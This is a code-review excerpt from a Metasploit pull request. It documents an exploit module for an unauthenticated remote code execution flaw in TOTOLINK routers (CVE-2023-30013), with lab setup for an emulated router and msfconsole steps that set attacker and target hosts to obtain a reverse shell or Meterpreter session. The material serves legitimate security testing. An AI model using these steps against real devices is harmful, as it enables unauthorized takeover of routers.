documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md

```diff
@@ -0,0 +1,337 @@
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          UP LOOPBACK RUNNING  MTU:65536  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
+
+sit0      Link encap:IPv6-in-IPv4
+          NOARP  MTU:1480  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
+
+tunl0     Link encap:UNSPEC  HWaddr 00-00-00-00-D4-7F-2C-6A-00-00-00-00-00-00-00-00
+          NOARP  MTU:1480  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
+
+/ # 
+```
+* there are two issues, first of all the bridge command showed `eth2` instead `eth0` and `br0` did not have any IP configured.
+* To fix this, run the following commands below to make the firmware accessible from the host.
+```ShellSession
+/ # brctl addif br0 eth0
+brctl addif br0 eth0
+/ # brctl show
+brctl show
+bridge name	bridge id		STP enabled	interfaces
+br0		8000.525400123456	yes		eth2
+							eth0
+/ # ifconfig eth0 up
+ifconfig eth0 up
+/ # ifconfig br0 192.168.0.1 netmask 255.255.255.0 broadcast 192.168.0.255
+ifconfig br0 192.168.0.1 netmask 255.255.255.0 broadcast 192.168.0.255
+/ #
+```
+* You should now be able to `ping` the network address 192.168.0.1 from your host and run a `nmap` command to check the services.
+```ShellSession
+ # ping 192.168.0.1
+PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
+64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=8.92 ms
+64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=2.38 ms
+^C
+--- 192.168.0.1 ping statistics ---
+2 packets transmitted, 2 received, 0% packet loss, time 1001ms
+rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
+ # nmap 192.168.0.1
+Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 17:44 UTC
+Nmap scan report for 192.168.0.1
+Host is up (0.011s latency).
+Not shown: 997 closed tcp ports (reset)
+PORT     STATE    SERVICE
+23/tcp   filtered telnet
+80/tcp   filtered http
+8080/tcp filtered http-proxy
+MAC Address: 52:54:00:12:34:56 (QEMU virtual NIC)
+
+Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds
+```
+* You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/totolink_x5000r_unauth_rce_cve_2023_30013`
+- [x] `set rhosts <ip-target>`
+- [x] `set rport <port>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Unix Command, 1=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `reverse shell` or `Meterpreter`
+
+```
+msf6 exploit(linux/http/totolink_x5000r_unauth_rce_cve_2023_30013) > options
```

Comment:
The documentation seems to be outdated. The module name is `linux/http/totolink_unauth_rce_cve_2023_30013`

Reply:
Fixed. 
See https://github.com/rapid7/metasploit-framework/pull/18365/commits/6e11f4353b46d29b9c62a8ca6db9459221bc5b07.